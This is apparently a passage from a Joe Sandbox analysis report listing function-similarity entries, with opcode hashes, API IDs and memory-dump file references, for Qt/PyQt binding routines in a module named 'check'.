                                                                                                                                                                                                                • Opcode ID: e9385aea60245421b889753081b914d4f15d5281564381813d9448da1f62e009
                                                                                                                                                                                                                • Instruction ID: a5f593ddb45e192daeed4ec3acf7d65b80fc0d497ae5cd1eb7cada7ade28189e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9385aea60245421b889753081b914d4f15d5281564381813d9448da1f62e009
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01215CB6B1CB41C2EB61CB25E8482A973A9FB99BC0F554176DE5C43764DF3CD5408710
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocPainterPath@@V0@@malloc
                                                                                                                                                                                                                • String ID: J9J9
                                                                                                                                                                                                                • API String ID: 3358426265-2881787613
                                                                                                                                                                                                                • Opcode ID: f1956ed14ec7a28130940f003eef32ba6ba9bfcf400e910d8c358bf818651b78
                                                                                                                                                                                                                • Instruction ID: 9ecb084a7072c0e3d9cf3a83b2b528dfe164354b4f02708798e02fa4d158069f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1956ed14ec7a28130940f003eef32ba6ba9bfcf400e910d8c358bf818651b78
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8217CB2B0CB4582EB60CB2AE85826933A9FB89BC0F654176DE5D037A4DF3CD440CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocRegion@@V0@@malloc
                                                                                                                                                                                                                • String ID: J9J9
                                                                                                                                                                                                                • API String ID: 2721989731-2881787613
                                                                                                                                                                                                                • Opcode ID: d7579a7eedf6d7dc8e5562b1eb984eef0869274ab665acd7b012c15386c248b1
                                                                                                                                                                                                                • Instruction ID: 7d01645865f530577cfccecf7bcaa7cea78a8e1fd7423d3dc75cd4011c1243d9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7579a7eedf6d7dc8e5562b1eb984eef0869274ab665acd7b012c15386c248b1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4217CB2B0CB45C2EB61CB25E84826933A9FB89BC0F558175DE5D03764DF3CD5408B00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                • Opcode ID: 3e0e32757434ec80e3b79828fe032dc9b677b45b792b156fa140777409428cee
                                                                                                                                                                                                                • Instruction ID: 812a55264225fef2eaf035b90912b7cce2484cebec0d918c74b197a75a37aa98
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e0e32757434ec80e3b79828fe032dc9b677b45b792b156fa140777409428cee
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5215CB5A0CB92C2EB609B65F40426AB368FB85BD8F5445B6DE8D13B68DF7CD045C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DoubleFloat_From
                                                                                                                                                                                                                • String ID: QVector3D$x(self) -> float
                                                                                                                                                                                                                • API String ID: 329246742-1354567454
                                                                                                                                                                                                                • Opcode ID: b164fee976c082549ce9376180b61b546f2038105489a99689e004863fd58a94
                                                                                                                                                                                                                • Instruction ID: 5d7797d9d01676c90b656be367abed3df721af1ad7b343b06c99b10392e30eab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b164fee976c082549ce9376180b61b546f2038105489a99689e004863fd58a94
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F011EB5B08A4AC1EB11CF75D8486A837A8FB55744FA18072CA5C13320DF7CD59AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DoubleFloat_From
                                                                                                                                                                                                                • String ID: QQuaternion$z(self) -> float
                                                                                                                                                                                                                • API String ID: 329246742-1128012678
                                                                                                                                                                                                                • Opcode ID: 99039d9004db0801bcfc5a1a37d3018496c2abebcca86cea28bae023adb2a50d
                                                                                                                                                                                                                • Instruction ID: 54229bdebf3d33543cfbc131b4f2135c60a6c82ccbb60c2944ad6a8295e85614
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99039d9004db0801bcfc5a1a37d3018496c2abebcca86cea28bae023adb2a50d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 170171B1A08B8AC0EB10CF75D8886A833A8FB55744F958072CA4C03320DF7CD649C740